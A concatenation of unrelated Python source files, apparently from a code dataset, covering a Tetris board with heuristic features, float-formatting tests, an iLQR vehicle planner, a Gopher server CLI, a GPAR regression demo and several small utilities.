continue
if only_tracked_in_git and not is_tracked_in_version_control(file):
continue
path = sep.join(dirs + [file])
if path in ignore:
continue
name = file[:-6]
name = name[0] + name[1:].replace('_', ' ')
if name in names:
print(name, 'already registered', path, names[name])
else:
names[name] = path
group_id = sep.join(dirs) if dirs else None
rule = NotebookRule(name, notebook=path, group=group_id)
rules.append(rule)
if group_id and group_id not in groups:
groups[group_id] = Group(id=group_id, name=dirs[-1], parent=sep.join(dirs[:-1]))
return {
'rules': rules,
'groups': groups
}
|
29489
|
import random
def get_random_bag():
"""Returns a bag with unique pieces. (Bag randomizer)"""
random_shapes = list(SHAPES)
random.shuffle(random_shapes)
return [Piece(0, 0, shape) for shape in random_shapes]
class Shape:
def __init__(self, code, blueprints):
self.code = code
self.rotations = len(blueprints)
self.blueprints = blueprints
self.shape_coords = []
self.width = len(blueprints[0])
self.height = len(blueprints)
for rotation in range(self.rotations):
self.shape_coords.append(list(self._create_shape_coords(rotation)))
def _get_blueprint(self, rotation):
"""Returns a list of strings that defines how the shape looks like."""
return self.blueprints[rotation % self.rotations]
def get_shape_coords(self, rotation):
"""Returns a list of relative coordinates that make up the shape."""
return self.shape_coords[rotation % self.rotations]
def _create_shape_coords(self, rotation):
blueprint = self._get_blueprint(rotation)
width = len(blueprint[0])
height = len(blueprint)
for offset_y in range(height):
for offset_x in range(width):
if blueprint[offset_y][offset_x] != ' ':
yield offset_y, offset_x
SHAPE_I = Shape(1, [[
' ',
'####',
' ',
' ',
], [
' # ',
' # ',
' # ',
' # ',
]])
SHAPE_O = Shape(2, [[
'##',
'##',
]])
SHAPE_T = Shape(3, [[
' ',
'###',
' # ',
], [
' # ',
'## ',
' # ',
], [
' # ',
'###',
' ',
], [
' # ',
' ##',
' # ',
]])
SHAPE_S = Shape(4, [[
' ',
' ##',
'## ',
], [
' # ',
' ##',
' #',
]])
SHAPE_Z = Shape(5, [[
' ',
'## ',
' ##',
], [
' #',
' ##',
' # ',
]])
SHAPE_J = Shape(6, [[
' ',
'###',
' #',
], [
' # ',
' # ',
'## ',
], [
'# ',
'###',
' ',
], [
' ##',
' # ',
' # ',
]])
SHAPE_L = Shape(7, [[
' ',
'###',
'# ',
], [
'## ',
' # ',
' # ',
], [
' #',
'###',
' ',
], [
' # ',
' # ',
' ##',
]])
SHAPES = [SHAPE_I, SHAPE_O, SHAPE_T, SHAPE_S, SHAPE_Z, SHAPE_J, SHAPE_L]
class Piece:
def __init__(self, x, y, shape: Shape, rotation=0):
self.x = x
self.y = y
self.shape = shape
self.rotation = rotation
self.shape_coords = None
def rotate(self, dir_rotate):
"""Rotate the piece."""
self.rotation += dir_rotate
self.shape_coords = None
def move(self, x, y):
"""Move the piece."""
self.x += x
self.y += y
self.shape_coords = None
def get_shape_coords(self):
"""Returns a list of coordinates that the piece occupies."""
if self.shape_coords is None:
begin_x = self.x - round(self.shape.width / 2)
begin_y = self.y
shape_coords = self.shape.get_shape_coords(self.rotation)
self.shape_coords = [(begin_x + offset_x, begin_y + offset_y) for offset_y, offset_x in shape_coords]
return self.shape_coords
class Board:
def __init__(self, columns, rows):
self.columns = columns
self.rows = rows
self.pieces_table = [[0 for i in range(columns)] for j in range(rows)]
self.piece = None
self.piece_next = None
self.piece_holding = None
self.piece_last = None
self.can_hold = True
self.bag = get_random_bag()
self.create_piece()
def create_piece(self):
"""The next piece becomes the current piece and spawn it on the board."""
if self.piece_next is not None:
self.piece = self.piece_next
else:
self.piece = self.bag.pop()
self.piece.move(int(self.columns / 2), 0)
self.piece_next = self.bag.pop()
self.can_hold = True
if not self.bag:
self.bag = get_random_bag()
def _place_piece(self):
"""Solidify the current piece onto the board and returns success."""
coords = self.piece.get_shape_coords()
if any(x < 0 or x >= self.columns or y < 0 or y >= self.rows or self.pieces_table[y][x] != 0 for x, y in
coords):
return False
for x, y in coords:
self.pieces_table[y][x] = self.piece.shape.code
self.piece_last = self.piece
self.piece = None
return True
def can_move_piece(self, dir_x, dir_y):
"""Returns true if the piece does not intersect with a non-empty cell when moved."""
for x, y in self.piece.get_shape_coords():
next_x = x + dir_x
next_y = y + dir_y
if next_x < 0 or next_x >= self.columns or next_y < 0 or next_y >= self.rows:
return False
if self.pieces_table[next_y][next_x] != 0:
return False
return True
def move_piece(self, dir_x):
"""Move the piece in a direction and returns success."""
if self.piece is None:
return False
if not self.can_move_piece(dir_x, 0):
return False
self.piece.move(dir_x, 0)
return True
def drop_piece(self):
"""Drop the piece by one cell and returns success."""
if self.piece is None:
return False
if not self.can_move_piece(0, 1):
self._place_piece()
return True
self.piece.move(0, 1)
return False
def rotate_piece(self, dir_rotation):
"""Rotate the current piece and returns success."""
if self.piece is None:
return False
self.piece.rotate(dir_rotation)
if not self.can_move_piece(0, 0):
if not self.move_piece(-1) and not self.move_piece(1):
self.piece.rotate(-dir_rotation)
return False
return True
def is_game_over(self):
"""Returns if the current piece is able to move."""
return self.piece is not None and not self.can_move_piece(0, 0)
def is_row(self, y):
"""Returns if the row is a fully filled one."""
return 0 not in self.pieces_table[y]
def remove_row(self, y):
"""Removes a row from the board."""
removed_row = self.pieces_table.pop(y)
self.pieces_table.insert(0, [0 for i in range(self.columns)])
return removed_row
def insert_row(self, y, row):
"""Inserts a row into the board."""
self.pieces_table.pop(0)
self.pieces_table.insert(y, row)
def move_and_drop(self, x, rotation):
"""Move the piece and drop it as far down as possible and returns success."""
if self.piece is None:
return False
self.piece.rotate(rotation)
return self.can_move_piece(0, 0) and self.move_piece(-self.piece.x + x) and self.drop_piece_fully()
def drop_piece_fully(self):
"""Drops the current piece as far down as possible and returns success."""
if self.piece is None:
return False
while self.can_move_piece(0, 1):
self.piece.move(0, 1)
return self._place_piece()
def hold_piece(self):
"""Switches the piece held with the current and returns success."""
if self.piece is None or not self.can_hold:
return False
piece_current = self.piece
self.piece = self.piece_holding
self.piece_holding = piece_current
self.piece_holding.move(-self.piece_holding.x, -self.piece_holding.y)
if self.piece is None:
self.create_piece()
else:
self.piece.move(int(self.columns / 2), 2)
self.can_hold = False
return True
def get_possible_states(self):
"""Returns all possible states of the board with the corresponding action tuple.
Tries out every possible way to turn and move the current piece.
The action taken and the state of the board is combined into a tuple and added to the returning list
After every try the board is reset to original state.
:rtype: A list with a tuple of (action, state).
action = (column, rotation)
state = return value of `get_info`
"""
if self.piece is None:
return []
states = []
last_piece = self.piece_last
for rotation in range(self.piece.shape.rotations):
for column in range(self.columns + 1):
piece = Piece(self.piece.x, self.piece.y, self.piece.shape, self.piece.rotation)
# Execute
if self.move_and_drop(column, rotation):
rows_cleared = self.get_cleared_rows()
removed_rows = []
for y in rows_cleared:
removed_rows.append((y, self.remove_row(y)))
# Save
states.append(((column, rotation), self.get_info(rows_cleared)))
# Reset
for y, row in reversed(removed_rows):
self.insert_row(y, row)
for x, y in self.piece_last.get_shape_coords():
self.pieces_table[y][x] = 0
self.piece = piece
self.piece_last = last_piece
return states
def get_info(self, rows_cleared):
"""Returns the state of the board using statistics.
0: Rows cleared
1: Bumpiness
2: Holes
3: Landing height
4: Row transitions
5: Column transitions
6: Cumulative wells
7: Eroded piece cells
8: Aggregate height
:rtype: Integer array
"""
if self.piece_last is not None:
last_piece_coords = self.piece_last.get_shape_coords()
eroded_piece_cells = len(rows_cleared) * sum(y in rows_cleared for x, y in last_piece_coords)
landing_height = 0 if self.piece_last is None else 1 + self.rows - max(y for x, y in last_piece_coords)
else:
eroded_piece_cells = 0
landing_height = 0
return [
len(rows_cleared),
self.get_bumpiness(),
self.get_hole_count(),
landing_height,
self.get_row_transitions(),
self.get_column_transitions(),
self.get_cumulative_wells(),
eroded_piece_cells,
self.get_aggregate_height(),
]
def get_cleared_rows(self):
"""Returns the the amount of rows cleared."""
return list(filter(lambda y: self.is_row(y), range(self.rows)))
def get_row_transitions(self):
"""Returns the number of horizontal cell transitions."""
total = 0
for y in range(self.rows):
row_count = 0
last_empty = False
for x in range(self.columns):
empty = self.pieces_table[y][x] == 0
if last_empty != empty:
row_count += 1
last_empty = empty
if last_empty:
row_count += 1
if last_empty and row_count == 2:
continue
total += row_count
return total
def get_column_transitions(self):
"""Returns the number of vertical cell transitions."""
total = 0
for x in range(self.columns):
column_count = 0
last_empty = False
for y in reversed(range(self.rows)):
empty = self.pieces_table[y][x] == 0
if last_empty and not empty:
column_count += 2
last_empty = empty
if last_empty and column_count == 1:
continue
total += column_count
return total
def get_bumpiness(self):
"""Returns the total of the difference between the height of each column."""
bumpiness = 0
last_height = -1
for x in range(self.columns):
current_height = 0
for y in range(self.rows):
if self.pieces_table[y][x] != 0:
current_height = self.rows - y
break
if last_height != -1:
bumpiness += abs(last_height - current_height)
last_height = current_height
return bumpiness
def get_cumulative_wells(self):
"""Returns the sum of all wells."""
wells = [0 for i in range(self.columns)]
for y, row in enumerate(self.pieces_table):
left_empty = True
for x, code in enumerate(row):
if code == 0:
well = False
right_empty = self.columns > x + 1 >= 0 and self.pieces_table[y][x + 1] == 0
if left_empty or right_empty:
well = True
wells[x] = 0 if well else wells[x] + 1
left_empty = True
else:
left_empty = False
return sum(wells)
def get_aggregate_height(self):
"""Returns the sum of the heights of each column."""
aggregate_height = 0
for x in range(self.columns):
for y in range(self.rows):
if self.pieces_table[y][x] != 0:
aggregate_height += self.rows - y
break
return aggregate_height
def get_hole_count(self):
"""returns the number of empty cells covered by a full cell."""
hole_count = 0
for x in range(self.columns):
below = False
for y in range(self.rows):
empty = self.pieces_table[y][x] == 0
if not below and not empty:
below = True
elif below and empty:
hole_count += 1
return hole_count
|
29501
|
import math
import sys
from fractions import Fraction
from random import uniform, randint
import decimal as dec
def log10_floor(f):
b, k = 1, -1
while b <= f:
b *= 10
k += 1
return k
def log10_ceil(f):
b, k = 1, 0
while b < f:
b *= 10
k += 1
return k
def log10_floor(f):
if f <= 0: return -1
t, b, k, k_step = 1, 10, 0, 1
while True:
t1 = t * b
if t1 > f:
if k_step == 1:
break
k_step = 1
b = 10
else:
b *= 10
k += k_step
k_step += 1
t = t1
return k
# for i in range(20):
# f = 10 ** i
# print(f'{f}: {log10_floor(f)}, {log10_floor2(f)}')
# print(log10_floor2(100))
# sys.exit(0)
def str_of_pos_float_hi0(prec, x):
assert x > 0
q = Fraction(x)
n = int(q)
if n > 0:
k = log10_floor(n) + 1
if k >= prec:
b = 10 ** (k - prec)
r, e = n // b, k - prec
else:
b = 10 ** (prec - k)
r, e = n * b + int((q - n) * b), k - prec
else:
k = log10_floor(int(1 / q))
b = 10 ** (k + prec)
r, e = int(q * b), -(k + prec)
if r * Fraction(10) ** e < q:
r += 1
s = str(r)
if len(s) > prec:
s = s[:-1]
e += 1
e += prec - 1
s = f'{s[0]}.{s[1:]}'
if e == 0:
return s
return s + ('e+' if e > 0 else 'e') + str(e)
def str_of_pos_float_hi1(prec, x):
assert x > 0
m, exp = math.frexp(x)
m, exp = int(math.ldexp(m, 53)), exp - 53
mask = (1 << abs(exp)) - 1
if exp >= 0:
n, rem = m << exp, 0
else:
n, rem = m >> -exp, m & mask
if n > 0:
k = log10_floor(n) + 1
if k >= prec:
b = 10 ** (k - prec)
(r, rem2), e = divmod(n, b), k - prec
rem2 = rem2 or rem
else:
b = 10 ** (prec - k)
t = rem * b
t, rem2 = t >> -exp, t & mask
r, e = n * b + t, k - prec
else:
k = log10_floor((1 << -exp) // rem)
b = 10 ** (k + prec)
t = rem * b
r, rem2, e = t >> -exp, t & mask, -(k + prec)
if rem2:
r += 1
s = str(r)
assert prec <= len(s) <= prec + 1
if len(s) > prec:
s = s[:-1]
e += 1
e += prec - 1
s = f'{s[0]}.{s[1:]}'
if e == 0:
return s
return s + ('e+' if e > 0 else 'e') + str(e)
def str_of_pos_float_lo(prec, x):
assert x > 0
m, exp = math.frexp(x)
m, exp = int(math.ldexp(m, 53)), exp - 53
if exp >= 0:
n, rem = m << exp, 0
else:
mask = (1 << abs(exp)) - 1
n, rem = m >> -exp, m & mask
if n > 0:
k = log10_floor(n) + 1
if k >= prec:
b = 10 ** (k - prec)
r, e = n // b, k - prec
else:
b = 10 ** (prec - k)
t = (rem * b) >> -exp
r, e = n * b + t, k - prec
else:
k = log10_floor((1 << -exp) // rem)
b = 10 ** (k + prec)
t = rem * b
r, e = (rem * b) >> -exp, -(k + prec)
s = str(r)
assert len(s) == prec
e += prec - 1
s = f'{s[0]}.{s[1:]}'
if e == 0:
return s
return s + ('e+' if e > 0 else 'e') + str(e)
# print(str_of_pos_float_hi(2, 230454523525e+100))
def decimal_test_hi(prec, x, s=None):
if s is None:
s = str_of_pos_float_hi1(prec, x)
with dec.localcontext() as ctx:
ctx.prec = prec
ctx.rounding = dec.ROUND_UP
v = +dec.Decimal(x)
t = +dec.Decimal(s)
if v != t:
print(f'Error (hi): decimal = {v}, my = {s} (prec = {prec}, x = {x})')
def decimal_test_lo(prec, x, s=None):
if s is None:
s = str_of_pos_float_lo(prec, x)
with dec.localcontext() as ctx:
ctx.prec = prec
ctx.rounding = dec.ROUND_DOWN
v = +dec.Decimal(x)
t = +dec.Decimal(s)
if v != t:
print(f'Error (lo): decimal = {v}, my = {s} (prec = {prec}, x = {x})')
def tests(n, a, b):
for _ in range(n):
x = uniform(a, b)
prec = randint(1, 15)
decimal_test_hi(prec, x)
decimal_test_lo(prec, x)
def tests2(n):
for _ in range(n):
prec = randint(1, 15)
t = randint(-100, 100)
decimal_test_hi(prec, 2.0 ** t)
decimal_test_lo(prec, 2.0 ** t)
tests(10000, 1e-300, 1)
tests(10000, 0.5, 1000)
tests(10000, 1e+10, 1e+100)
tests(10000, 1e-300, 1e+300)
tests2(10000)
#print(str_of_pos_float_hi1(1, 0.47))
#print(str_of_pos_float_hi1(1, 0.5))
# print(str_of_pos_float_hi1(100, 0.3))
def check_ocaml_results(fname):
print(f'Checking: {fname}')
with open(fname, 'r') as f:
for line in f:
x, prec, s0, s1, s_lo = line.strip().split(',')
decimal_test_hi(int(prec), float(x), s0)
decimal_test_hi(int(prec), float(x), s1)
decimal_test_lo(int(prec), float(x), s_lo)
check_ocaml_results('out.txt')
|
29507
|
import glob
import matplotlib.pyplot as plt
import numpy as np
import sys
plt.ion()
data_files = list(glob.glob(sys.argv[1]+'/mnist_net_*_train.log'))
valid_data_files = list(glob.glob(sys.argv[1]+'/mnist_net_*_valid.log'))
for fname in data_files:
data = np.loadtxt(fname).reshape(-1, 3)
name = fname.split('/')[-1]
plt.plot(data[:, 0], 1-data[:, 2], label=name)
for fname in valid_data_files:
data = np.loadtxt(fname).reshape(-1, 2)
name = fname.split('/')[-1]
plt.plot(data[:, 0], 1-data[:, 1], label=name)
plt.legend(loc=1)
raw_input('Press Enter.')
|
29523
|
import math
import numpy as np
import matplotlib.pyplot as plt
import scipy.integrate as integrate
import pdb
import sys
from ilqr.vehicle_model import Model
from ilqr.local_planner import LocalPlanner
from ilqr.constraints import Constraints
class iLQR():
def __init__(self, args, obstacle_bb, verbose=False):
self.args = args
self.Ts = args.timestep
self.N = args.horizon
self.tol = args.tol
self.obstacle_bb = obstacle_bb
self.verbose = verbose
self.global_plan = None
self.local_planner = LocalPlanner(args)
self.vehicle_model = Model(args)
self.constraints = Constraints(args, obstacle_bb)
# initial nominal trajectory
self.control_seq = np.zeros((self.args.num_ctrls, self.args.horizon))
self.control_seq[0, :] = np.ones((self.args.horizon)) * 0.5
self.debug_flag = 0
self.lamb_factor = 10
self.max_lamb = 1000
# self.fig, (self.ax1, self.ax2, self.ax3) = plt.subplots(1,3, num=0, figsize=(20, 5))
def set_global_plan(self, global_plan):
self.global_plan = global_plan
self.local_planner.set_global_planner(self.global_plan)
def get_nominal_trajectory(self, X_0, U):
X = np.zeros((self.args.num_states, self.args.horizon+1))
X[:, 0] = X_0
for i in range(self.args.horizon):
X[:, i+1] = self.vehicle_model.forward_simulate(X[:, i], U[:, i])
return X
def forward_pass(self, X, U, k, K):
X_new = np.zeros((self.args.num_states, self.args.horizon+1))
X_new[:, 0] = X[:, 0]
U_new = np.zeros((self.args.num_ctrls, self.args.horizon))
# Do a forward rollout and get states at all control points
for i in range(self.args.horizon):
U_new[:, i] = U[:, i] + k[:, i] + K[:, :, i] @ (X_new[:, i] - X[:, i])
X_new[:, i+1] = self.vehicle_model.forward_simulate(X_new[:, i], U_new[:, i])
return X_new, U_new
def backward_pass(self, X, U, poly_coeff, x_local_plan, npc_traj, lamb):
# Find control sequence that minimizes Q-value function
# Get derivatives of Q-function wrt to state and control
l_x, l_xx, l_u, l_uu, l_ux = self.constraints.get_cost_derivatives(X[:, 1:], U, poly_coeff, x_local_plan, npc_traj)
df_dx = self.vehicle_model.get_A_matrix(X[2, 1:], X[3, 1:], U[0,:])
df_du = self.vehicle_model.get_B_matrix(X[3, 1:])
# Value function at final timestep is known
V_x = l_x[:,-1]
V_xx = l_xx[:,:,-1]
# Allocate space for feedforward and feeback term
k = np.zeros((self.args.num_ctrls, self.args.horizon))
K = np.zeros((self.args.num_ctrls, self.args.num_states, self.args.horizon))
# Run a backwards pass from N-1 control step
for i in range(self.args.horizon-1,-1,-1):
Q_x = l_x[:,i] + df_dx[:,:,i].T @ V_x
Q_u = l_u[:,i] + df_du[:,:,i].T @ V_x
Q_xx = l_xx[:,:,i] + df_dx[:,:,i].T @ V_xx @ df_dx[:,:,i]
Q_ux = l_ux[:,:,i] + df_du[:,:,i].T @ V_xx @ df_dx[:,:,i]
Q_uu = l_uu[:,:,i] + df_du[:,:,i].T @ V_xx @ df_du[:,:,i]
# Q_uu_inv = np.linalg.pinv(Q_uu)
Q_uu_evals, Q_uu_evecs = np.linalg.eig(Q_uu)
Q_uu_evals[Q_uu_evals < 0] = 0.0
Q_uu_evals += lamb
Q_uu_inv = np.dot(Q_uu_evecs,np.dot(np.diag(1.0/Q_uu_evals), Q_uu_evecs.T))
# Calculate feedforward and feedback terms
k[:,i] = -Q_uu_inv @ Q_u
K[:,:,i] = -Q_uu_inv @ Q_ux
# Update value function for next time step
V_x = Q_x - K[:,:,i].T @ Q_uu @ k[:,i]
V_xx = Q_xx - K[:,:,i].T @ Q_uu @ K[:,:,i]
return k, K
def run_step(self, ego_state, npc_traj):
assert self.global_plan is not None, "Set a global plan in iLQR before starting run_step"
self.local_planner.set_ego_state(ego_state)
ref_traj, poly_coeff = self.local_planner.get_local_plan()
X_0 = np.array([ego_state[0][0], ego_state[0][1], ego_state[1][0], ego_state[2][2]])
# self.control_seq[:, :-1] = self.control_seq[:, 1:]
# self.control_seq[:, -1] = np.zeros((self.args.num_ctrls))
X, U = self.get_optimal_control_seq(X_0, self.control_seq, poly_coeff, ref_traj[:, 0], npc_traj)
traj = X[:2, ::int(self.args.horizon/10)].T
self.control_seq = U
# self.plot(U, X, ref_traj)
return traj, ref_traj, U #self.filter_control(U, X[2,:])
def get_optimal_control_seq(self, X_0, U, poly_coeff, x_local_plan, npc_traj):
X = self.get_nominal_trajectory(X_0, U)
J_old = sys.float_info.max
lamb = 1 # Regularization parameter
# Run iLQR for max iterations
for itr in range(self.args.max_iters):
k, K = self.backward_pass(X, U, poly_coeff, x_local_plan, npc_traj, lamb)
# Get control values at control points and new states again by a forward rollout
X_new, U_new = self.forward_pass(X, U, k, K)
J_new = self.constraints.get_total_cost(X, U, poly_coeff, x_local_plan, npc_traj)
if J_new < J_old:
X = X_new
U = U_new
lamb /= self.lamb_factor
if (abs(J_old - J_new) < self.args.tol):
print("Tolerance reached")
break
else:
lamb *= self.lamb_factor
if lamb > self.max_lamb:
break
J_old = J_new
# print(J_new)
return X, U
def filter_control(self, U, velocity):
U[1] = np.arctan2(self.args.wheelbase*U[1],velocity[:-1])
return U
def plot(self, control, X, ref_traj):
self.ax1.clear()
self.ax1.plot(np.arange(len(control[0])), control[0,:], color='g', label='Acc')
self.ax1.plot(np.arange(len(control[0])), control[1,:], color='b', label='Yaw Rate')
self.ax1.set_ylabel('Values')
self.ax1.set_xlabel('Time')
self.ax1.set_title('Controls',fontsize=18)
# self.ax1.xlim(0, len(control[0]))
# self.ax1.ylim(-6, 6)
# self.ax1.axis('equal')
self.ax1.legend()
self.ax1.grid()
self.ax2.clear()
self.ax2.plot(ref_traj[:, 0], ref_traj[:, 1], color='r', label='Ref Traj')
self.ax2.plot(X[0, :], X[1, :], color='g', label='Real Traj')
self.ax2.set_ylabel('y')
self.ax2.set_xlabel('x')
self.ax2.set_title('Position Trajectory',fontsize=18)
self.ax2.legend()
self.ax2.grid()
# plt.legend()
self.ax3.clear()
self.ax3.plot(np.arange(len(X[0])), X[2, :], color='r', label='Velocity')
self.ax3.plot(np.arange(len(X[0])), X[3, :], color='g', label='Yaw')
self.ax3.set_ylabel('Values')
self.ax3.set_xlabel('Time')
self.ax3.set_title('Traj',fontsize=18)
self.ax3.grid()
self.ax3.legend()
plt.pause(0.001)
|
29556
|
import matplotlib.pyplot as plt
import numpy as np
from gpar.regression import GPARRegressor
from wbml.experiment import WorkingDirectory
import wbml.plot
if __name__ == "__main__":
wd = WorkingDirectory("_experiments", "synthetic", seed=1)
# Create toy data set.
n = 200
x = np.linspace(0, 1, n)
noise = 0.1
# Draw functions depending on each other in complicated ways.
f1 = -np.sin(10 * np.pi * (x + 1)) / (2 * x + 1) - x ** 4
f2 = np.cos(f1) ** 2 + np.sin(3 * x)
f3 = f2 * f1 ** 2 + 3 * x
f = np.stack((f1, f2, f3), axis=0).T
# Add noise and subsample.
y = f + noise * np.random.randn(n, 3)
x_obs, y_obs = x[::8], y[::8]
# Fit and predict GPAR.
model = GPARRegressor(
scale=0.1,
linear=True,
linear_scale=10.0,
nonlinear=True,
nonlinear_scale=0.1,
noise=0.1,
impute=True,
replace=False,
normalise_y=False,
)
model.fit(x_obs, y_obs)
means, lowers, uppers = model.predict(
x, num_samples=200, credible_bounds=True, latent=True
)
# Fit and predict independent GPs: set `markov=0` in GPAR.
igp = GPARRegressor(
scale=0.1,
linear=True,
linear_scale=10.0,
nonlinear=True,
nonlinear_scale=0.1,
noise=0.1,
markov=0,
normalise_y=False,
)
igp.fit(x_obs, y_obs)
igp_means, igp_lowers, igp_uppers = igp.predict(
x, num_samples=200, credible_bounds=True, latent=True
)
# Plot the result.
plt.figure(figsize=(15, 3))
for i in range(3):
plt.subplot(1, 3, i + 1)
# Plot observations.
plt.scatter(x_obs, y_obs[:, i], label="Observations", style="train")
plt.plot(x, f[:, i], label="Truth", style="test")
# Plot GPAR.
plt.plot(x, means[:, i], label="GPAR", style="pred")
plt.fill_between(x, lowers[:, i], uppers[:, i], style="pred")
# Plot independent GPs.
plt.plot(x, igp_means[:, i], label="IGP", style="pred2")
plt.fill_between(x, igp_lowers[:, i], igp_uppers[:, i], style="pred2")
plt.xlabel("$t$")
plt.ylabel(f"$y_{i + 1}$")
wbml.plot.tweak(legend=i == 2)
plt.tight_layout()
plt.savefig(wd.file("synthetic.pdf"))
|
29574
|
import unittest
import io
from unittest import mock
from tests.lib.utils import INSPECT
from custom_image_cli.validation_tool import validation_helper
from custom_image_cli.validation_tool.validation_models.validation_models import \
ImageDetail, ImageManifest, EmrRelease
class TestValidationHelper(unittest.TestCase):
def setUp(self) -> None:
self.inspect = INSPECT
self.manifest = ImageManifest([EmrRelease("release_name", [ImageDetail("image_type", None, [], [])])], [], [])
@mock.patch('sys.stdout', new_callable=io.StringIO)
@mock.patch('custom_image_cli.validation_tool.validation_helper.load_validation_info')
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_local_job_run.CheckLocalJobRun.check")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_manifest.CheckManifest.check")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_manifest.CheckManifest.__init__")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_files.CheckFiles.check")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_files.CheckFiles.__init__")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_envs.CheckEnvs.check")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_envs.CheckEnvs.__init__")
def test_validate_all(self, check_envs_constructor, check_envs, check_files_constructor,
check_files, check_manifest_constructor,
check_manifest, check_local_job_run, load_info, mock_stdout):
check_envs_constructor.return_value = None
check_envs.return_value = True
check_files_constructor.return_value = None
check_files.return_value = True
check_manifest_constructor.return_value = None
check_manifest.return_value = True
check_local_job_run.return_value = True
load_info.return_value = ImageDetail("image_type", None, [], []), [], []
actual = validation_helper.validate_all(self.inspect, "docker_cmd", "docker_image_uri",
self.manifest, "release_name", "image_type", "log")
self.assertEqual(actual, True)
check_manifest.assert_called_once()
check_envs.assert_called_once()
check_files.assert_called_once()
check_local_job_run.assert_called_once()
expected = "... Checking Image Manifest\n"
self.assertEqual(expected, mock_stdout.getvalue())
@mock.patch("custom_image_cli.validation_tool.check_inputs.check_version")
@mock.patch("custom_image_cli.validation_tool.check_inputs.check_image")
def test_load_validation_info(self, check_image, check_version):
value = self.manifest
check_version.return_value = None
check_image.return_value = None
actual_img, actual_file, actual_env = validation_helper.load_validation_info(self.manifest, "release_name", "image_type", "log")
self.assertEqual(actual_img, self.manifest.emr_releases[0].images[0])
self.assertEqual(actual_file, [])
self.assertEqual(actual_env, [])
check_version.assert_called_once_with(self.manifest.emr_releases[0], "release_name", "log")
check_image.assert_called_once_with(self.manifest.emr_releases[0].images[0], "image_type", "log")
|
29599
|
import importlib
import sys
import pituophis
# check if the user is running the script with the correct number of arguments
if len(sys.argv) < 2:
# if not, print the usage
print('usage: pituophis [command] cd [options]')
print('Commands:')
print(' serve [options]')
print(' fetch [url] [options]')
print('Server Options:')
print(' -H, --host=HOST\t\tAdvertised host (default: 127.0.0.1)')
print(' -p, --port=PORT\t\tPort to bind to (default: 70)')
print(' -a, --advertised-port=PORT\tPort to advertise')
print(' -d, --directory=DIR\t\tDirectory to serve (default: pub/)')
print(' -A, --alt-handler=HANDLER\tAlternate handler to use if 404 error is generated (python file with it defined as "def alt(request):")')
print(' -s, --send-period\t\tSend a period at the end of each response (default: False)')
print(' -D, --debug\t\t\tPrint requests as they are received (default: False)')
print(' -v, --version\t\t\tPrint version')
print('Fetch Options:')
print(' -o, --output=FILE\t\tFile to write to (default: stdout)')
else:
# check if the user is serving or fetching
if sys.argv[1] == 'serve':
# check for arguments
# host
host = '127.0.0.1'
if '-H' in sys.argv or '--host' in sys.argv:
host = sys.argv[sys.argv.index('-H') + 1]
# port
port = 70
if '-p' in sys.argv or '--port' in sys.argv:
port = int(sys.argv[sys.argv.index('-p') + 1])
# advertised port
advertised_port = None
if '-a' in sys.argv or '--advertised-port' in sys.argv:
advertised_port = int(sys.argv[sys.argv.index('-a') + 1])
# directory
pub_dir = 'pub/'
if '-d' in sys.argv or '--directory' in sys.argv:
pub_dir = sys.argv[sys.argv.index('-d') + 1]
# alternate handler
alt_handler = False
if '-A' in sys.argv or '--alt-handler' in sys.argv:
alt_handler = sys.argv[sys.argv.index('-A') + 1]
# get the function from the file
alt_handler = getattr(
importlib.import_module(alt_handler), 'handler')
# send period
send_period = False
if '-s' in sys.argv or '--send-period' in sys.argv:
send_period = True
# debug
debug = False
if '-D' in sys.argv or '--debug' in sys.argv:
debug = True
# start the server
pituophis.serve(host=host, port=port, advertised_port=advertised_port,
handler=pituophis.handle, pub_dir=pub_dir, alt_handler=alt_handler,
send_period=send_period, debug=debug)
elif sys.argv[1] == 'fetch':
# check for arguments
# url
url = sys.argv[2]
# output file
output = 'stdout'
if '-o' in sys.argv or '--output' in sys.argv:
output = sys.argv[sys.argv.index('-o') + 1]
# start the fetch
o = pituophis.get(url)
if output == 'stdout':
sys.stdout.buffer.write(o.binary)
else:
with open(output, 'wb') as f:
f.write(o.binary)
f.close()
|
29642
|
import ConfigParser
from datetime import datetime
import os
import sys
import numpy as np
import pandas as pd
import utils.counts
import utils.counts_deviation
__author__ = '<NAME>'
# This script finds the days with the greatest deviation from some reference value (such as hourly means or medians)
if __name__ == '__main__':
if len(sys.argv) < 2:
print 'ERROR: need to supply the path to the conifg file'
config_path = sys.argv[1]
conf = ConfigParser.ConfigParser()
conf.read(config_path)
# Paths
station_TS_dir = conf.get('Paths', 'station_TS_dir') # Path to station Time Series
ref_counts_file = conf.get('Paths', 'ref_counts_file')
out_file = conf.get('Paths', 'out_file') # Where to write the counts file
# Parameters
start_date = conf.get('Params', 'start_date')
end_date = conf.get('Params', 'end_date')
days = [int(d.strip()) for d in conf.get('Params', 'days').split(',')]
measure = conf.get('Params', 'measure')
# Get target dates
targ_dates = utils.counts.date_string_list(start_date, end_date, days)
# Create the counts file
ref = utils.counts.df_from_counts(ref_counts_file) # DF w/ mean flow for each link
measures = []
keepers = []
for i, stat in enumerate(ref.columns):
# Get path to stat ts file
print 'Processings station: %s' % str(stat)
print 'Number %d of %d' % (i, ref.shape[1])
ts_path = os.path.join(station_TS_dir, str(stat), 'time_series.csv')
c_dev = utils.counts_deviation.CountsDeviation(ts_path, targ_dates)
if c_dev.missing: # if there is missing data, we skip the whole station
print "Missing data. Skipping station: %s" % str(stat)
continue
c_dev.calc_measure(measure, reference=ref[stat])
measures.append(c_dev.measures[measure])
keepers.append(stat)
df = pd.DataFrame(measures).transpose()
df.columns = keepers
df.index = targ_dates
df.dropna(axis=1)
df['Max_Dev'] = df.apply(np.sum, axis=1)
df.to_csv(out_file)
|
29643
|
from django.http import HttpResponse
class HttpResponseNoContent(HttpResponse):
status_code = 204
|
29648
|
import tensorflow as tf
i = tf.compat.v1.constant(0, name="Hole")
c = lambda i: tf.compat.v1.less(i, 10)
b = lambda i: tf.compat.v1.add(i, 1)
r = tf.compat.v1.while_loop(c, b, [i], name="While")
|
29707
|
import base64
import json
import os
import tempfile
import uuid
import zipfile
from io import BytesIO
import werkzeug
from flask import Blueprint, jsonify, request
from ..config import get_config
from ..dataset import convert_ndarray_to_image, import_csv_as_mdp_dataset
